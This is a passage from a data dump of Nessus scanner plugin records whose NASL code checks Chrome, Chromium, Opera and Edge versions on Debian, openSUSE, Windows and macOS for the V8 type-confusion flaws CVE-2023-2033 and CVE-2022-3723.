(Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-17T00:00:00", "type": "nessus", "title": "Debian DSA-5390-1 : chromium - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-05-17T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:chromium", "p-cpe:/a:debian:debian_linux:chromium-common", "p-cpe:/a:debian:debian_linux:chromium-driver", "p-cpe:/a:debian:debian_linux:chromium-l10n", "p-cpe:/a:debian:debian_linux:chromium-sandbox", "p-cpe:/a:debian:debian_linux:chromium-shell", "cpe:/o:debian:debian_linux:11.0"], "id": "DEBIAN_DSA-5390.NASL", "href": "https://www.tenable.com/plugins/nessus/174397", "sourceData": "#%NASL_MIN_LEVEL 80900\n#\n# (C) Tenable, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dsa-5390. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174397);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/17\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"Debian DSA-5390-1 : chromium - security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 11 host has packages installed that are affected by a vulnerability as referenced in the dsa-5390\nadvisory.\n\n - Type confusion in V8 in Google Chrome prior to 112.0.5615.121 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=1034406\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/source-package/chromium\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.debian.org/security/2023/dsa-5390\");\n script_set_attribute(attribute:\"see_also\", value:\"https://security-tracker.debian.org/tracker/CVE-2023-2033\");\n script_set_attribute(attribute:\"see_also\", value:\"https://packages.debian.org/source/bullseye/chromium\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade the chromium packages.\n\nFor the stable distribution (bullseye), this problem has been fixed in version 112.0.5615.121-1~deb11u1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/17\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium\");\n script_set_attribute(attribute:\"cpe\", 
value:\"p-cpe:/a:debian:debian_linux:chromium-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-driver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-l10n\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-sandbox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:chromium-shell\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:11.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Debian Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('debian_package.inc');\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar debian_release = get_kb_item('Host/Debian/release');\nif ( isnull(debian_release) ) audit(AUDIT_OS_NOT, 'Debian');\ndebian_release = chomp(debian_release);\nif (! 
preg(pattern:\"^(11)\\.[0-9]+\", string:debian_release)) audit(AUDIT_OS_NOT, 'Debian 11.0', 'Debian ' + debian_release);\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Debian', cpu);\n\nvar pkgs = [\n {'release': '11.0', 'prefix': 'chromium', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-common', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-driver', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-l10n', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-sandbox', 'reference': '112.0.5615.121-1~deb11u1'},\n {'release': '11.0', 'prefix': 'chromium-shell', 'reference': '112.0.5615.121-1~deb11u1'}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var _release = NULL;\n var prefix = NULL;\n var reference = NULL;\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['prefix'])) prefix = package_array['prefix'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (_release && prefix && reference) {\n if (deb_check(release:_release, prefix:prefix, reference:reference)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : deb_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = deb_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'chromium / chromium-common / chromium-driver / chromium-l10n / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T12:57:37", "description": "The version of Google Chrome installed on the remote Windows host is prior to 112.0.5615.121. 
It is, therefore, affected by a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-14T00:00:00", "type": "nessus", "title": "Google Chrome < 112.0.5615.121 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-07-27T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "GOOGLE_CHROME_112_0_5615_121.NASL", "href": "https://www.tenable.com/plugins/nessus/174332", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174332);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/07/27\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"Google Chrome < 112.0.5615.121 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote Windows host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote Windows host is prior to 112.0.5615.121. It is, therefore, affected\nby a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. 
(CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7311aaa4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1432210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 112.0.5615.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\", \"smb_hotfixes.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('SMB/Google_Chrome/Installed');\nvar installs = get_kb_list('SMB/Google_Chrome/*');\n\nvar product_name = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows Server 2012\" >< product_name)\n audit(AUDIT_OS_SP_NOT_VULN);\n\ngoogle_chrome_check_version(installs:installs, fix:'112.0.5615.121', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:09", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the openSUSE-SU-2022:10218-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-27T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : opera (openSUSE-SU-2022:10218-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.3"], "id": "OPENSUSE-2022-10218-1.NASL", "href": "https://www.tenable.com/plugins/nessus/168203", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10218-1. 
The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168203);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n\n script_name(english:\"openSUSE 15 Security Update : opera (openSUSE-SU-2022:10218-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the\nopenSUSE-SU-2022:10218-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. (Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/AUXLEW4XOFSF5F25BFYCIF4VH46PGPXO/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?120995fe\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-3723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n 
script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.3\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/SuSE/release');\nif (isnull(os_release) || os_release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar _os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:os_release);\nif (isnull(_os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\n_os_ver = _os_ver[1];\nif (os_release !~ \"^(SUSE15\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.3', os_release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + _os_ver, cpu);\n\nvar pkgs = [\n {'reference':'opera-93.0.4585.11-lp153.2.69.1', 'cpu':'x86_64', 'release':'SUSE15.3', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach 
package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var _cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (rpm_check(release:_release, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'opera');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:56:00", "description": "The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the openSUSE-SU-2022:10219-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-27T00:00:00", "type": "nessus", "title": "openSUSE 15 Security Update : opera (openSUSE-SU-2022:10219-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-09-20T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:opera", "cpe:/o:novell:opensuse:15.4"], "id": "OPENSUSE-2022-10219-1.NASL", "href": "https://www.tenable.com/plugins/nessus/168202", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n#\n# The package checks in this plugin were extracted from\n# openSUSE Security Update openSUSE-SU-2022:10219-1. The text itself\n# is copyright (C) SUSE.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(168202);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/09/20\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n\n script_name(english:\"openSUSE 15 Security Update : opera (openSUSE-SU-2022:10219-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote SUSE Linux SUSE15 host has a package installed that is affected by a vulnerability as referenced in the\nopenSUSE-SU-2022:10219-1 advisory.\n\n - Type confusion in V8 in Google Chrome prior to 107.0.5304.87 allowed a remote attacker to potentially\n exploit heap corruption via a crafted HTML page. 
(Chromium security severity: High) (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/M3YSR5SGLX4ZWKZX5LU5PNOXUXPMIUPR/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?0dc5a900\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.suse.com/security/cve/CVE-2022-3723\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected opera package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-3723\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/10/27\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/11/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/11/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:opera\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.4\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nvar os_release = get_kb_item('Host/SuSE/release');\nif (isnull(os_release) || os_release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, 'openSUSE');\nvar _os_ver = pregmatch(pattern: \"^SUSE([\\d.]+)\", string:os_release);\nif (isnull(_os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'openSUSE');\n_os_ver = _os_ver[1];\nif (os_release !~ \"^(SUSE15\\.4)$\") audit(AUDIT_OS_RELEASE_NOT, 'openSUSE', '15.4', os_release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'openSUSE ' + _os_ver, cpu);\n\nvar pkgs = [\n {'reference':'opera-93.0.4585.11-lp154.2.29.1', 'cpu':'x86_64', 'release':'SUSE15.4', 'rpm_spec_vers_cmp':TRUE}\n];\n\nvar flag = 0;\nforeach package_array ( pkgs ) {\n var reference = NULL;\n var _release = NULL;\n var _cpu = NULL;\n var rpm_spec_vers_cmp = NULL;\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) _release = package_array['release'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (reference && _release) {\n if (rpm_check(release:_release, cpu:_cpu, reference:reference, rpm_spec_vers_cmp:rpm_spec_vers_cmp)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = 
pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'opera');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-21T12:57:37", "description": "The version of Google Chrome installed on the remote macOS host is prior to 112.0.5615.121. It is, therefore, affected by a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. (CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2023-04-14T00:00:00", "type": "nessus", "title": "Google Chrome < 112.0.5615.121 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2023-2033"], "modified": "2023-05-17T00:00:00", "cpe": ["cpe:/a:google:chrome"], "id": "MACOSX_GOOGLE_CHROME_112_0_5615_121.NASL", "href": "https://www.tenable.com/plugins/nessus/174333", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(174333);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/17\");\n\n script_cve_id(\"CVE-2023-2033\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2023/05/08\");\n script_xref(name:\"IAVA\", value:\"2023-A-0203-S\");\n\n script_name(english:\"Google Chrome < 112.0.5615.121 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A web browser installed on the remote macOS host is affected by a vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Google Chrome installed on the remote macOS host is prior to 112.0.5615.121. It is, therefore, affected\nby a vulnerability as referenced in the 2023_04_stable-channel-update-for-desktop_14 advisory.\n\n - Type Confusion in V8. 
(CVE-2023-2033)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n # https://chromereleases.googleblog.com/2023/04/stable-channel-update-for-desktop_14.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7311aaa4\");\n script_set_attribute(attribute:\"see_also\", value:\"https://crbug.com/1432210\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Google Chrome version 112.0.5615.121 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2023-2033\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2023/04/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2023/04/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2023 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"macosx_google_chrome_installed.nbin\");\n script_require_keys(\"MacOSX/Google Chrome/Installed\");\n\n exit(0);\n}\ninclude('google_chrome_version.inc');\n\nget_kb_item_or_exit('MacOSX/Google Chrome/Installed');\n\ngoogle_chrome_check_version(fix:'112.0.5615.121', severity:SECURITY_HOLE, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-10-27T12:58:07", "description": "The version of Microsoft Edge installed on the remote Windows host is prior to 107.0.1418.26. It is, therefore, affected by a vulnerability as referenced in the October 31, 2022 advisory.\n\n - Type Confusion in V8. (CVE-2022-3723)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2022-11-01T00:00:00", "type": "nessus", "title": "Microsoft Edge (Chromium) < 107.0.1418.26 Vulnerability", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-3723"], "modified": "2023-10-06T00:00:00", "cpe": ["cpe:/a:microsoft:edge"], "id": "MICROSOFT_EDGE_CHROMIUM_107_0_1418_26.NASL", "href": "https://www.tenable.com/plugins/nessus/166749", "sourceData": "#%NASL_MIN_LEVEL 80900\n##\n# (C) Tenable, Inc.\n##\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(166749);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/10/06\");\n\n script_cve_id(\"CVE-2022-3723\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/11/18\");\n script_xref(name:\"IAVA\", value:\"2022-A-0453-S\");\n\n script_name(english:\"Microsoft Edge (Chromium) < 107.0.1418.26 Vulnerability\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an web browser installed that is affected by a vulnerability\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Edge installed on the remote Windows host is prior to 
